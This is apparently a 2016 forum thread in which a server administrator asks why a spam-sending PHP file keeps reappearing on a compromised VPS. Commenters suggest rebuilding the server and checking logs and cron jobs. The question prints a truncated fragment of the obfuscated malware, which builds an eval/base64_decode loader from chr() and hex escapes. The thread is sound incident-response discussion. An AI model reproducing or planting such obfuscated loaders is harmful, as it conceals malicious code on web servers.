0
I just started working with this client recently, and when i got into his server, it was full of viruses. At least 4 of his cpanel users had viruses on their websites (completely managed by him). The viruses were sending spam emails at a rate of 5 per second when i started. I went through and removed all of the viruses, worked on security holes, etc. I stopped all spam emails from coming in, but there's a single php file that keeps reappearing every time i delete it. I deleted it on march 31, the single file reappeared on april 2. i deleted it on april 3, it reappeared april 7. I'm wondering if anybody has a suggestion for how I can find the security hole.
The directory has a total of 9 files in it, only one of which is php, not including the virus itself. It's a very small website, and it's almost completely HTML. the only other PHP file is a contact form. I don't think it's anything within the directory, but no other viruses appear anywhere else on the system.
Any suggestions?
EDIT
this is what the virus code looks like, all on a single line. it's 3585 characters long.
$f7pm25=chr(112)."re".chr(10chr(103).chr(95)."\x72".chr(101).
"p\x6C\x61".chr(99)."e";$q1Y7Aj="e".chr(118)."\x61".chr(108)."
(b\x61\x73\x65\x364\x5F\x64".chr(101).chr(99)."o\x64".chr(101)."\x28\x22\x5
1".chr(71)."\x56".chr(121)."\x63\x6d".chr(57).chr(121)."\x58\x33J".chr(108)
."
Katushai
Posted 2016-04-07T16:07:11.503
Reputation: 113
1There's no single way to check for all viruses and things like that unfortunately. Your safest bet is to backup the files for the website, check them and then rebuild the server (or have the hosting company reset your portal) if you believe there is still a virus. Unless you know more about what type of malware it is (ie, does that php file appear on virustotal or elsewhere? does the name come up in searches? what about the content?) it is almost impossible to verify it's all been cleared out. – Abraxas – 2016-04-07T16:12:27.677
right, it is hard to do. it's a VPS, owned by my boss and managed by me, now. i added a snippet of code from the virus above – Katushai – 2016-04-07T16:14:57.243
also, it isn't detected by any virus scanners or malware detectors. but it's definitely the virus that's sending out the emails. it came up as the source of emails in exim_mainlog – Katushai – 2016-04-07T16:18:04.320
1It sounds like you should take the "nuke from orbit". This means you configure the server from scratch or disable the user's account, that is infecting the server, and create them a new account. – Ramhound – 2016-04-07T16:19:29.767
you think? that wouldn't be that hard to do actually. luckily i have access to everything and i don't have to go through any red tape. i just wish i knew what the security hole was, so i know to close it in the future. if anybody has a good list of common security holes ill up vote it – Katushai – 2016-04-07T16:20:48.367
2Yes, if you want to be secure, start over. You have no idea what task is triggering the file to be created, what user is creating it, etc. Even if it was as simple as someone compromised your server and set up a malicious cron job, you have no way to know if they put other stuff in other places. Also, this isn't really a place to say 'how do I secure 'x' against 'hacking'. It's much more a forum for questions like 'how do I secure this single thing from that single thing'. But the obvious tips are - don't use default pws, use separate accts, stay up to date, minimize surface (fewest services) – Abraxas – 2016-04-07T16:25:27.197
You can compare records from your apache log with creation time of that virus file to catch suspicious IP and http request from it. – Oleg Bolden – 2016-04-07T20:11:01.043
This is a simple but effective firewall: http://www.php-firewall.info
– Oleg Bolden – 2016-04-07T20:19:12.570